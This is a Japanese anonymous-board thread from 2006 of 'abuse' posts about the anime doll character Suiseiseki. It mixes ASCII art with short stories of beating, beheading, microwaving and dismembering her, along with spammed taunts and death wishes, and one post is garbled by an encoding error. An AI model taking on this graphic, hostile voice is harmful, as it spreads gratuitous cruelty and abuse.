61 :名無しちゃん…電波届いた?:2006/06/20(火) 00:15:17
>>60
病院に行こうね

62 :名無しちゃん…電波届いた?:2006/06/20(火) 00:15:46
もしよかったら誰か虐待SSのコピペ貼ってね。

63 :名無しちゃん…電波届いた?:2006/06/20(火) 00:19:02
   ___       ___      ___       ___      ___      ___
 く/',二二ヽ>  く/',二二ヽ>  く/',二二ヽ>  く/',二二ヽ>  く/',二二ヽ> く/',二二ヽ>
  |l |ノ。ノイハ))  |l |ノ。ノイハ))  |l |ノ。ノイハ))  .|l |ノ。ノイハ))  |l |ノ。ノイハ)) |l |ノ。ノイハ))
.ヽ|l |(* 々゚ノ|ノ ヽ|l |(* 々゚ノ|ノ.ヽ|l |(* 々゚ノ|ノ .ヽ|l |(* 々゚ノ|ノ.ヽ|l |(* 々゚ノ|ノヽ|l |(* 々゚ノ|ノ
 ノl_| へ  )   ノl_| へ  )  ノl_| へ  )    ノl_| へ  )  ノl_| へ  )  ノl_| へ  )
. ミ     >ミ  ミ     >ミ ミ     >ミ  ミ     >ミ ミ     >ミ ミ     >ミ
      ___       ___      ___      ___      ___       ___
    く/',二二ヽ>  く/',二二ヽ>  く/',二二ヽ>  く/',二二ヽ> く/',二二ヽ>  く/',二二ヽ>
     |l |ノ。ノイハ))  |l |ノ。ノイハ))  |l |ノ。ノイハ))  |l |ノ。ノイハ))  |l |ノ。ノイハ))  |l |ノ。ノイハ))
   .ヽ|l |(* 々゚ノ|ノ ヽ|l |(* 々゚ノ|ノ.ヽ|l |(* 々゚ノ|ノ ヽ|l |(* 々゚ノ|ノ ヽ|l |(* 々゚ノ|ノ. ヽ|l |(* 々゚ノ|ノ
    ノl_| へ  )   ノl_| へ  )  ノl_| へ  )  ノl_| へ  )  .ノl_| へ  )  .ノl_| へ  )
    ミ     >ミ ミ     >ミ ミ     >ミ ミ     >ミ ミ     >ミ ミ     >ミ
   ___       ___      ___      ___      ___       ___
. く/',二二ヽ>   く/',二二ヽ> く/',二二ヽ>  く/',二二ヽ>  く/',二二ヽ>  く/',二二ヽ>
 |l |ノ。ノイハ))   |l |ノ。ノイハ))  |l |ノ。ノイハ))  |l |ノ。ノイハ))  |l |ノ。ノイハ))  |l |ノ。ノイハ))
ヽ|l |(* 々゚ノ|ノ .ヽ|l |(* 々゚ノ|ノ.ヽ|l |(* 々゚ノ|ノ ヽ|l |(* 々゚ノ|ノ ヽ|l |(* 々゚ノ|ノ. ヽ|l |(* 々゚ノ|ノ
. ノl_| へ  )   ノl_| へ  ) . ノl_| へ  )  ノl_| へ  )  .ノl_| へ  )  .ノl_| へ  )
 ミ     >ミ  ミ     >ミ ミ     >ミ ミ     >ミ ミ     >ミ ミ     >ミ

64 :名無しちゃん…電波届いた?:2006/06/20(火) 00:20:05
                               ヽ`        く/', ,li
      ´ 々゚.;.;i    永  遠  に  お  や  す  み  −  ,,:。゙゙゙i;)
       。 .;.                      ´.    ´ ´  |l |(* 々゚;ヽヽ`;;
                ,;,.く/iii      __,,:::========:::,,__
         ;;;;;;,i。.;. ..        ...‐''゙ .  ` ´ ´、 ゝ   ''‐...   く/';;;     .;.
                      ..‐´      ゙          `‐..   ;;;。ノイ`
     ;*;∵; 。*;         /                  .;. .;. ゚ノ|. .;,
        .................;;;;;;;;;;;;;;;;;;;;;;::´  。ノイ;::::                 ヽ.:;;;;;;;;;;;;;;;;;;;;;;.................
   .......;;;;;;;;;;゙゙゙゙゙゙゙゙゙゙゙゙゙       .'      ~';∴ 々゚i;,                  ヽ      ゙゙゙゙゙゙゙゙゙゙゙゙゙;;;;;;;;;;......
  ;;;;;;゙゙゙゙゙            /                           ゙:                ゙゙゙゙゙;;;;;;
  ゙゙゙゙゙;;;;;;;;............        ;゙                              ゙;       .............;;;;;;;;゙゙゙゙゙
      ゙゙゙゙゙゙゙゙゙;;;;;;;;;;;;;;;;;.......;.............................              ................................;.......;;;;;;;;;;;;;;;;;゙゙゙゙゙゙゙゙゙
                ゙゙゙゙i;゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙;l゙゙゙゙゙
  ;;;;。ノイハ))      ノi|lli; i . .;, 、    .,,            ` ; 、  .; ´ ;,il||iγ
 ゙゙゙i;/々;;;;i;      /゙||lii|li||,;,.il|i;, ; . ., ,li   ' ;   .` .;    il,.;;.:||i .i| :;il|l||;(゙
                `;;i|l|li||lll|||il;i:ii,..,.i||l´i,,.;,.. .il `,  ,i|;.,l;;:`ii||iil||il||il||l||i|lii゙ゝ

65 :名無しちゃん…電波届いた?:2006/06/20(火) 00:20:14
>>63
病院に行こうね

66 :名無しちゃん…電波届いた?:2006/06/20(火) 00:20:44
>>64
病院に行こうね

67 :名無しちゃん…電波届いた?:2006/06/20(火) 00:22:45
>>66
病院に行こうねw

68 :名無しちゃん…電波届いた?:2006/06/20(火) 01:21:01
翠星石死ね

69 :名無しちゃん…電波届いた?:2006/06/20(火) 01:50:57
>>68
病院に行こうね

70 :名無しちゃん…電波届いた?:2006/06/20(火) 08:04:30
>>69
病院に行こうね

71 :名無しちゃん…電波届いた?:2006/06/20(火) 12:59:10
>>70
病院に行こうね

72 :名無しちゃん…電波届いた?:2006/06/20(火) 17:34:16
>>71
病院に行こうねw

┏━━━━━━┳━━━━━━━━━━━━━━┓
┃⇒虐待する   ┃クソミドリか゛ あらわれた。     ┃
┃  ブッコロス  ┃と゛ うする?▲            ┃
┃  折 檻    ┃                     ┃
┃  ΡΟΑ   ┃                     ┃
┗━━━━━━┻━━━━━━━━━━━━━━┛

                ___
              く/',二二ヽ>
               |l |ノ。ノイハ))
              ノl_|(* 々゚ノ|
             ≦ / っっl ≧
             ミ しー‐J  ミ

73 :名無しちゃん…電波届いた?:2006/06/20(火) 23:39:26
>>72
病院に行こうね

74 :名無しちゃん…電波届いた?:2006/06/20(火) 23:47:59
>>73
病院に行こうねw

75 :名無しちゃん…電波届いた?:2006/06/21(水) 00:04:10
>>74
病院に行こうね

76 :名無しちゃん…電波届いた?:2006/06/21(水) 00:20:50
このスレ粘着出てきてからつまんなくなったな

77 :名無しちゃん…電波届いた?:2006/06/21(水) 00:23:20
死ねや糞翠w
                                               ですぅ!!
           __,,ゝ┼─┼====┐.        ''"´"'''::;:,,,          Ω ;: ;  Ω
           | □|   .| |:|ヾ二二二二二(O″     ,,;;;;´."'''     Ω ・,' ;*;∵; ζ。;:,.
      _____|__,|_;||___,| |:|ノ-┬─┘     ´''::;;;;::'''"´         ∵~'ハ∴∵;:;
     |ミ///   /   ~~|ミ|丘百~((==___    バゴーン          |l#ξρ。;,;。∵
    .└┼-┴─┴───┴──┐~~'''''-ゝ-┤              '.:; *,,,,: ;・∵:;゚
     ((◎)~~~O~~~~~O~~(◎))三)──)三);                ノl⊂l_介」つ
      ..ゝ(◎)(◎)(◎)(◎) (◎)ノ三ノ――ノ三ノ;*;∵              ≦ノ`ヽノヘ≧
                                              ミく二二二〉ミ

78 :名無しちゃん…電波届いた?:2006/06/21(水) 00:24:58
>>77
病院に行こうね

79 :名無さん?:2006/06/21(水) 00:26:11
お前が一番の電波じゃんw

80 :名無しちゃん…電波届いた?:2006/06/22(木) 19:09:18
   ___        _______
 く/',ニニヽ>    |●●| ∧_∧  |⊇
  |l |ノ。ノイハ))    |●●|(´∀` )  |⊇  
  |l |(* 々゚ノ)       ̄⊂二二 )  ̄
≦ノl_|/ っっl≧        Y  人
ミ  しー‐J ミ       (( (_」 J  ))

81 :名無しちゃん…電波届いた?:2006/06/22(木) 22:32:20
>>80
病院に行こうね

82 :名無しちゃん…電波届いた?:2006/06/22(木) 22:56:07
お前が何と言おうと翠星石が嫌われてるのは事実だw
トロイメント10話見てみろだ?なんじゃそりゃ。

83 :名無しちゃん…電波届いた?:2006/06/23(金) 00:19:52
翠星石も翠キチも死ねって事で

84 :お花畑の庭師:2006/06/23(金) 21:09:56
「あぁぁぁ…翠星石ぃ…翠星石殺す…」今や狂人と化した俺のただならぬ殺気に、身の危険を察知した翠星石は逃げ出した。「嫌ですぅ!逃げるですぅ!」だがそれは無駄な努力だった。次の瞬間、俺は翠星石のロングヘアーを掴むと、力任せに引っ張った。

85 :お花畑の庭師:2006/06/23(金) 21:19:10
「痛いです!離しやがれですぅ!」 更に髪を引っ張りながら床に叩きつける。ドシャーン!俺はポケットからメリケンサックを取りだし右手に嵌め、翠星石の顔面を力いっぱい殴りつけた。バキッ!ドス!グシャ!

86 :お花畑の庭師:2006/06/23(金) 21:29:25
「ふぐぅ…うぅ…痛いですぅ…痛いですよ…」紅緑のオッドアイから、とめどなく涙が溢れ出る。翠星石の顔面は変形し、陥没し、涙と涎で汚れている。「汚ねぇツラだなおい!…今、楽にしてやるぜ」俺は隠していた大きな鎌を取り出すと、翠星石の首にあてがった。

87 :お花畑の庭師:2006/06/23(金) 21:37:25
「や…やめてですぅ…助けて…」弱々しく呟く翠星石。「あばよクソミドリ!お花畑に散れ!」俺は自分でも訳のわかんねぇ事を叫びながら、死神の鎌で性悪人形の首を狩り取ったのだった…。 ENDE

88 :名無しちゃん…電波届いた?:2006/06/23(金) 22:07:24
             ___
.          く/',二二ヽ>  スイセイセキニハ オトウサマガ
            |l |ノノイハ))  ツイテイルデスゥ!
           ノl_|リ゚ ヮ゚ノl|') キットソラモトベルハズデスゥ!
          ≦c(,_u_,ノ≧
 _,,..-―'"⌒"~⌒"~ ゙゙̄"'''ョ、
゙~,,,....-=-‐√"゙゙T"~ ̄Y"゙=ミ
T  |   l,_,,/\ ,,/l  |
,.-r '"l\,,j  /  |/  L,,,/
,,/|,/\,/ _,|\_,i_,,,/ /
_V\ ,,/\,|  ,,∧,,|_/



              , '⌒丶
             γ   丶丶
            从     、ヽヽ、
 _,,..-―'"⌒"~⌒"~ ゙゙̄"'''ョ、     Ω∩
゙~,,,....-=-‐√"゙゙T"~ ̄Y"゙=ミ    ⊂'   ヽ ブーンデスゥー!
T  |   l,_,,/\ ,,/l  |     く/',二二ヽ>
,.-r '"l\,,j  /  |/  L,,,/      |l |ノノイハ))
,,/|,/\,/ _,|\_,i_,,,/ /      cノl_| ^ω^ノl|っ
_V\ ,,/\,|  ,,∧,,|_/



 _,,..-―'"⌒"~⌒"~ ゙゙̄"'''ョ、
゙~,,,....-=-‐√"゙゙T"~ ̄Y"゙=ミ
T  |   l,_,,/\ ,,/l  |
,.-r '"l\,,j  /  |/  L,,,/
,,/|,/\,/ _,|\_,i_,,,/ /
_V\ ,,/\,|  ,,∧,,|_/          \ グチャッ /

89 :名無しちゃん…電波届いた?:2006/06/23(金) 22:12:08
>>88
病院に行こうね

90 :名無しちゃん…電波届いた?:2006/06/23(金) 22:13:32
           _____________
          /                  /|
        /____________ /  |
        |┏━━━━━━━━━┓  |   |   @レンジに入れてタイマーを60秒に。
        |┃      ___      ┃◎ |   |
        |┃   .く/',二二ヽ>    .┃60 |   |
        |┃     |l |ノノイハ))デスゥ! ┃  |   |
        |┃     |∩#゚听ノ∩   】【  |   |
        |┃    ノl.ヽ{l_介」}丿   ┃  |   |
        |┃    ≦ノ`ヽノヘ≧   ┃■ |   | _
        |┃ (( ミく二二二〉ミ ))  ┃  |  / /|
      / |┗━━━━━━━━━┛  |/ / ∠|
      |  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|/
       □ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄□

           _____________
          /                  /|
        /____________ /  |
        |┏━━━━━━━━━┓  |   |   A暫くは元気に抵抗を試みますが・・・
        |┃      ___      ┃◎ |   |
        |┃    く#   >ヽ    ┃50 |   |
        |┃     |\ィイl |)))   ┃  |   |
        |┃ コンチク||||l||l|| l |ノショー! 】【  |   |
        |┃    ⊂ノノ从ヾ,つ    ┃  |   |
        |┃    ≦ノ`ヽノヘ≧    ┃■ |   | _
        |┃ (( ミ〈二二二〉ミ ))  ┃  |  / /|
      / |┗━━━━━━━━━┛  |/ /.∠|
      |  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|/
       □ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄□

91 :名無しちゃん…電波届いた?:2006/06/23(金) 22:13:46
>>90
病院に行こうね

92 :名無しちゃん…電波届いた?:2006/06/23(金) 22:14:18
           _____________
          /                  /|
        /____________ /  |
        |┏━━━━━━━━━┓  |   |   Bその内ヘッドドレスの端あたりが焦げてきて・・・
        |┃      ___      ┃◎ |   |
        |┃    ◆',二二 ◆   ┃40 |   |
        |┃    |l |ノノイハ)).   ┃  |   |
        |┃ .アツイ|l |リ"Д"ノ|デスゥ!】【  |   |
        |┃    ノ⊂l_介_|つ.   ┃  |   |
        |┃    ≦ノ`ヽノヘ≧   ┃■ |   | _
        |┃ (( ミく二二二〉ミ ))  ┃  |  / /|
      / |┗━━━━━━━━━┛  |/ /.∠|
      |  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|/
       □ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄□

           _____________
          /                  /|
        /____________ /  |
        |┏━━━━━━━━━┓  |   |   Cスカートも焦げればあと半分ぐらいで・・・
        |┃      ___      ┃◎ |   |
        |┃    ◆   ◆ヽ    ┃30 |   |
        |┃     |\ィイl |)))   ┃  |   |
        |┃コゲル…|||l||l|| l |ノデs…】【  |   |
        |┃    ⊂ノノ从ヾ,つ    ┃  |   |
        |┃    ≦ノ`ヽノヘ≧    ┃■ |   | _
        |┃ (( ミ◆二二 ◆ミ )) ┃  |  / /|
      / |┗━━━━━━━━━┛  |/ /.∠|
      |  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|/
       □ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄□

93 :名無しちゃん…電波届いた?:2006/06/23(金) 22:14:33
>>92
病院に行こうね

94 :名無しちゃん…電波届いた?:2006/06/23(金) 22:15:32
           _____________
          /                  /|
        /____________ /  |
        |┏━━━━━━━━━┓  |   |   Dこのあたりで脳ミソ沸騰し出しまして・・・
        |┃     ___      .┃◎ |   |
        |┃   ◆',二二.◆    ┃20 |   |
        |┃    |l |ノノイハ))    ┃  |   |
        |┃   …|l(*" 々")ムーン. 】【  |   |
        |┃   ノ⊂l__介__|⊃   ┃  |   |
        |┃  ≦( `ヽノ  )≧.  ┃■ |   | _
        |┃ (( ミ◆二二二◆ミ )) ┃  |  / /|
      / |┗━━━━━━━━━┛  |/ /.∠|
      |  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|/
       □ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄□

           _____________
          /                  /|
        /____________ /  |
        |┏━━━━━━━━━┓   |   |   Eあぼーん!てな感じですな。(藁藁
        |┃;:;;:;:;:;:;:;:;:;:;;:;;:;:;:;:;:;;;:;:;::::;;;:┃◎ |   |
        |┃;:;:;:;;:;:;:;:;::::;;;:;;:;;;;:::::;;;;;;:;:;:;┃10 |   |
        |┃:;;:;::;''∴◆;;M;;';''∴;;;:;;:;::┃  |   |
        |┃;:;::;:;:;∴Σ::※;;バーーン!;;】【  |   |
        |┃;:;:;;;'◆~;;∴W;;':::;;;;;:;:::;;;;:┃  |   |
        |┃:;:;:;:;:;:::;;;;:;::;;:;:;;;;;;:;;:;::;:;::;::;┃■ |   | _
        |┃;((;;::;;::.;;;;;::;;;,;;;:;;;;:;:;::;::));┃  |  / /|
      / |┗━━━━━━━━━┛  |/ /.∠|
      |  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|/
       □ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄□

95 :名無しちゃん…電波届いた?:2006/06/23(金) 22:15:46
>>94
病院に行こうね

96 :名無しちゃん…電波届いた?:2006/06/23(金) 22:16:19
           _____________
          /                  /|
        /____________ /  |
        |┏━━━━━━━━━┓   |   |   Fさていよいよ待望の再会のお時間です・・・
        |┃             ┃◎ |   |
        |┃             ┃00 |   |
        |┃             ┃  |   |
        |┃   チ〜ンッ♪    】【  |   |
        |┃             ┃  |   |
        |┃             ┃■ |   | _
        |┃             ┃  |  / /|
      / |┗━━━━━━━━━┛  |/ /.∠|
      |  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|/
       □ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄□

            _____________
           /                  /|
         /____________ / .|
━━━━━━┳━━━━━━━━━┓   |   |   Gこんがり上手に出来ました!熱いから気をつけてね〜♪
;::        ‖   ∬,,,,,,,,,,,,,∬    ┃◎ |   |
 :;;       ‖    ,';::::;:;:;:;::;ヽ,    ┃-- |   |
    ;:;    ‖    |;;::ノノイハ))    ┃  .|   |
【  カパッ;   ‖    |;;(;;;:;д:;::)    ┃  |   |
    ;;;    ‖   ノ(:;;l;;:;:::;」::;)    ┃  |   |
   ::;     ‖∬ ≦ノ;:;:::;;;;ヘ≧ ∬ ┃■ |   | _
       :;; ‖◆ ミく:;:;:;:;:;:;:::;〉ミ ◆ ┃  |  / /|
━━━━━━┻━━━━━━━━━┛  |/ /∠|
      |  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|/
       □ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄□

97 :名無しちゃん…電波届いた?:2006/06/23(金) 22:16:34
>>96
病院に行こうね

98 :名無しちゃん…電波届いた?:2006/06/23(金) 22:29:50
     .┌"" ̄〔二二二〕 ̄""┐
   ┌'"" ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄""┐
   |゙        .(○○).       ゙|
   |(7|7|4|M) l     l [上野]  |ファァァァァァン
   |..____________ |  ファァァァァァン 
   | | | ̄ ̄ ̄ | ̄ ̄ ̄| ̄ ̄ ̄ | | |    ファーーーーーーーーン
   | | |       |      |⊂=@=∩| | |
   | | |____|__ _ ( ・x・ ).| | |
   | ────────────..|
   |         -     -     JR.  |
   | _        __         _ |
   |_o___________○___.o_| ゴゴゴゴゴゴゴゴゴ
    ll゙''豆||豆''H {×ロ} H jj''||豆''゙ll
    ├─┘_'三三三三三'_└─┤
..   \_|________|_/
     ─//────\\─
    ─//──────\\─
  ─//────────\\─
. ─//───── ___ ──\\─
やめてくれですぅ  く/',二二ヽ>──\\─
たすけてくれですぅ |l |ノノイハ))───\\─
/────⊂´|||||||ノl_|リTДT)|────\\─


ドカシッゴボッグガガガガガガボガボ
ガココココココバキバキバキャキャキャ
ガコッガコッガコッガコッグゴゴゴゴゴ
グモッチュイーーンボゴゴゴゴゴ
ですぅぅぅぅぅぅぅぅぅぅぅぅぅぅぅぅぅ

99 :名無しちゃん…電波届いた?:2006/06/23(金) 22:30:40
     .┌"" ̄〔二二二〕 ̄""┐
   ┌'"" ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄""┐
   |゙        .(○○).       ゙|
   |(7|7|4|M) l     l [上野]  |
   |..____________ |
   | | | ̄ ̄ ̄ | ̄ ̄ ̄| ̄ ̄ ̄ | | |
   | | |       |      |⊂=@=∩| | |ニコニコ
   | | |____|__ _ ( ^x^ ) | | |
   | ────────────..|
   |         -     -     JR.  |
   | _        __         _ |
   |_o___________○___.o_|
    ll゙''豆||豆''H {×ロ} H jj''||豆''゙ll
    ├─┘_'三三三三三'_└─┤
..   \_|________|_/
     ─//;;;;::......;;く/';;;;;;;;;;;;ヽ>....,,,,
    ─//リ゙々゚)──O;;,,::,,:,\\;;⊃
  ─//─────────\\─


100 :名無しちゃん…電波届いた?:2006/06/23(金) 22:31:16
>>98
病院に行こうね

101 :名無しちゃん…電波届いた?:2006/06/23(金) 22:31:25
                          ┗0=============0┛
               \===========[_|_|_|_|_|_|_|_|_|_|_|_|_|_]===========/
            /三三三三三三三三三三三三三三三三三三三三\
                  0 │ |∞∞∞ |::|∞∞田田∞∞|::|∞∞∞ | ::|  0
            [二] | ::|       |::|┏━━━━┓|::|       | ::l [二]
◎○@※◎○@※. |□|.│ |┌┬┐ |::|┃クソミドリ ┃|::| ┌┬┐| ::|. |□| ◎○@※◎○@※
ii|iiii|iiii|iiii|iiii|iiii|iiii|iiii| `)三(´| ::|├┼┤ |::|┃く/'二二ヽ┃|::| ├┼┤| ::|`)三(´il|iiii|iiii|iiii|iiii|iiii|iiii|iiii|
@※◎○@※◎○ | ::| | ::|└┴┘ |::|┃|l |ノ。ノイハ)┃|::| └┴┘| ::| | ::|  @※◎○@※◎○
ii|iiii|iiii|iiii|iiii|iiii|iiii|iiii|li┏━━━━━┓|::|┃|l |(* 々゚ノ|┃|::|┏━━━━━┓ li|iiii|iiii|iiii|iiii|iiii|iiii|iiii|l
◎○@iiii※◎○@ ┣┳┳┳┳┳┫|::|┗━━━━┛|::|┣┳┳┳┳┳┫ ◎○@iiii※◎○@
ii|iiii|iiii|iiii|iiii|iiii|iiii|iiii|l ○    ●        ∫∬∫∬        ●    ○ ii|iiii|iiii|iiii|iiii|iiii|iiii|iiii|li
               ○○  ●●      iiiii iii ii iiii       ●●  ○○
           [ ̄ ̄] [ ̄ ̄]   ( ̄ ̄ ̄ ̄ ̄)    [ ̄ ̄] [ ̄ ̄]
                |_○_|  .|_○_|     |_____|     |_○_|  .|_○_|

102 :名無しちゃん…電波届いた?:2006/06/23(金) 22:31:47
>>99
病院に行こうね

103 :名無しちゃん…電波届いた?:2006/06/23(金) 22:32:17
>>101
病院に行こうね

104 :名無しちゃん…電波届いた?:2006/06/23(金) 23:21:24
>>103
うんこ

105 :名無しちゃん…電波届いた?:2006/06/23(金) 23:40:48
>>104
病院に行こうね

106 :名無しちゃん…電波届いた?:2006/06/23(金) 23:58:45
>>105
338 名前: ◆pmFmA/Iv.k 2006/02/22(水) 21:36:42 ID:KqLZZU8o

いち翠星石萌えの俺がひとつ言いたい事がある。
翠星石を虐待・虐殺するヤツと
翠星石を虐待・虐殺したレスを見てGJとかイイとか言ってるヤツは全員氏ね。
中にはこれらを愛ある虐待と言うヤツもいるだろうがそれはただの虐待であって自分には愛は感じられない。
もうこんな真似は止めてくれ。頼む。

これおまえだろw

107 :名無しちゃん…電波届いた?:2006/06/24(土) 00:05:26
>>106
うんこ

108 :名無しちゃん…電波届いた?:2006/06/24(土) 00:15:54
こいつら見苦しすぎる

109 :名無しちゃん…電波届いた?:2006/06/24(土) 00:41:44
MUGENでいつも翠星石をボコボコにしてます^^

110 :名無しちゃん…電波届いた?:2006/06/24(土) 06:20:37
>>109
病院に行こうね

111 :名無しちゃん…電波届いた?:2006/06/24(土) 11:01:33
>>110
外に出ようね

112 :名無しちゃん…電波届いた?:2006/06/24(土) 13:20:29
>>111
病院に行こうね

113 :名無しちゃん…電波届いた?:2006/06/24(土) 13:22:12
>>112、おめぇ…
      / /  | l|  ,,-'"/゙/,」|    /    ..::;;;,,,  }  /   |~ ,,-‐,,,-'''  //~
     / /-'''''| | /l /‐'''/'' .人   i'    .:: :;'" / / l  ノ゙i// ,,-‐'"──==
     //'"   ゙i;: | /‐' ./,, ,,ノ ゙i;,.  |     _,,-ヾ.// ノ ,-''" l |  ‐'"   ,,,-‐二
     レ'     ヽl:i' ./  )'、‐,\゙i;: | ,,,-‐二-┬ナ" /‐'"‐ 〉 ,i'───'''" ̄~-''"
         ,-‐',ヽ|'"  ./゙ヽ-ゝ='\゙i,'''ヽ -゙=‐'   '" ,‐'ノ,, /‐''" ,,-‐'''"~
        / / ;;:.  ──ヽ, ゙i;'''''' , ゙ "-‐'''''"""    〔_,/ ゙ヽ'-'"~
       / /   / ,; ,,_}_  ゙、 ./__,,  _,,       /      \
      ,;'  / ,;;;:;:/;: ,,   ~ ヽ ヽ.  ヽニ‐'、     / /       ゙i,_
    ./        ''  ,l,,,,,,/ 〉  ゙ヽ、 '''' :;l  ,,-''" /        ゙i.\
ここ可笑しいんじゃねぇのか?

114 :名無しちゃん…電波届いた?:2006/06/24(土) 14:44:05
>>113
病院に行こうね

115 :お花畑の糞緑虫:2006/06/24(土) 15:32:39
( ゜∀ ゜)アヒャ!翠星石だって!何これ?人形が動いて喋ってるよ!アヒャ!ねぇこれ壊してもいい?ねぇ殺してもいい?アヒャヒャヒャヒャヒャヒャヒャヒャヒャヒャヒャヒャヒャヒャヒャヒャヒャ!!!

116 :名無しちゃん…電波届いた?:2006/06/24(土) 15:50:08
>>115
病院に行こうね

117 :名無しちゃん…電波届いた?:2006/06/24(土) 18:45:55
>>115
いいよ
>>116
ワロスw

118 :名無しちゃん…電波届いた?:2006/06/24(土) 20:00:58
>>115
どうぞどうぞ

119 :名無しちゃん…電波届いた?:2006/06/25(日) 03:43:34
>>115、おめぇ…
      / /  | l|  ,,-'"/゙/,」|    /    ..::;;;,,,  }  /   |~ ,,-‐,,,-'''  //~
     / /-'''''| | /l /‐'''/'' .人   i'    .:: :;'" / / l  ノ゙i// ,,-‐'"──==
     //'"   ゙i;: | /‐' ./,, ,,ノ ゙i;,.  |     _,,-ヾ.// ノ ,-''" l |  ‐'"   ,,,-‐二
     レ'     ヽl:i' ./  )'、‐,\゙i;: | ,,,-‐二-┬ナ" /‐'"‐ 〉 ,i'───'''" ̄~-''"
         ,-‐',ヽ|'"  ./゙ヽ-ゝ='\゙i,'''ヽ -゙=‐'   '" ,‐'ノ,, /‐''" ,,-‐'''"~
        / / ;;:.  ──ヽ, ゙i;'''''' , ゙ "-‐'''''"""    〔_,/ ゙ヽ'-'"~
       / /   / ,; ,,_}_  ゙、 ./__,,  _,,       /      \
      ,;'  / ,;;;:;:/;: ,,   ~ ヽ ヽ.  ヽニ‐'、     / /       ゙i,_
    ./        ''  ,l,,,,,,/ 〉  ゙ヽ、 '''' :;l  ,,-''" /        ゙i.\
ここ可笑しいんじゃねぇのか?

120 :名無しちゃん…電波届いた?:2006/06/25(日) 10:52:19
>>119
ここは電波板ですが何か?

121 :名無しちゃん…電波届いた?:2006/06/25(日) 13:53:24
>>119
まーた人の真似してるよ┐(゚〜゚)┌

122 :名無しちゃん…電波届いた?:2006/06/28(水) 19:52:39
縺ァ縺吶≦シ√〒縺吶≦シ∽コ疲怦陟縺邱題勠繧呈ョコ螳ウ縺帙ュ縺ー窶ヲ繧ッ繧ス繝溘ラ繝ェ繧呈ョコ縺輔ュ縺ー縲∫悄縺ョ蟷ウ蜥後ッ險ェ繧後∪縺シ>>1縺ォ蜷梧э縲

123 :名無しちゃん…電波届いた?:2006/06/28(水) 22:18:01
>>122
何この電波は?

124 :名無しちゃん…電波届いた?:2006/06/29(木) 00:24:11
( ゜Д ゜)!

125 :名無しちゃん…電波届いた?:2006/06/29(木) 00:25:59
>>122、おめぇ…
      / /  | l|  ,,-'"/゙/,」|    /    ..::;;;,,,  }  /   |~ ,,-‐,,,-'''  //~
     / /-'''''| | /l /‐'''/'' .人   i'    .:: :;'" / / l  ノ゙i// ,,-‐'"──==
     //'"   ゙i;: | /‐' ./,, ,,ノ ゙i;,.  |     _,,-ヾ.// ノ ,-''" l |  ‐'"   ,,,-‐二
     レ'     ヽl:i' ./  )'、‐,\゙i;: | ,,,-‐二-┬ナ" /‐'"‐ 〉 ,i'───'''" ̄~-''"
         ,-‐',ヽ|'"  ./゙ヽ-ゝ='\゙i,'''ヽ -゙=‐'   '" ,‐'ノ,, /‐''" ,,-‐'''"~
        / / ;;:.  ──ヽ, ゙i;'''''' , ゙ "-‐'''''"""    〔_,/ ゙ヽ'-'"~
       / /   / ,; ,,_}_  ゙、 ./__,,  _,,       /      \
      ,;'  / ,;;;:;:/;: ,,   ~ ヽ ヽ.  ヽニ‐'、     / /       ゙i,_
    ./        ''  ,l,,,,,,/ 〉  ゙ヽ、 '''' :;l  ,,-''" /        ゙i.\

126 :名無しちゃん…電波届いた?:2006/07/04(火) 18:10:04
翠星石死ね

127 :名無しちゃん…電波届いた?:2006/07/10(月) 00:49:18
ですぅですぅうるさいから、さっき両手足をもいで土砂降りの雨の中へ放りなげといた。 それでもですぅですぅ言っててむかついた。

128 :名無しちゃん…電波届いた?:2006/07/14(金) 22:18:55
あげてやるですぅ!救い様の無い奇形・不具者人形翠星石を抹殺するですよ人間。生まれながらに出来損ないのジャンクな翠星石は、虐待される為に創られたのですぅ!

129 :名無しちゃん…電波届いた?:2006/07/14(金) 22:51:21
>>128
  よ〜し翠星石。ドールの穴って言う、
  翠星石にとっての天国に連れって上げるよ。
.      ,lヽヘ/ヽ ___
     <    く/',二二ヽ>
     / ノlノ^^ノノ|l |ノノイハ))
     ヾcリ口ヮ |l |リ^ヮ^ノ|  デスゥ♪ソコハキットラクエンデスネ
       l llつノlとl_介」つ
       |._ハ_ミく,,つ,,つ〉ミ
.     (( ゝ' ゝ'
""""""""""""""""""""""""""""""""""""""""""

130 :名無しちゃん…電波届いた?:2006/07/14(金) 22:51:57
         ほーら、翠星石の天国だよw
              ,lヽヘ/ヽ
             <     へ
             / ノlノ^^ノノリ>、
             ヾcリ口∀口ゝ il|    lll
               l llつ lつ   lil lll
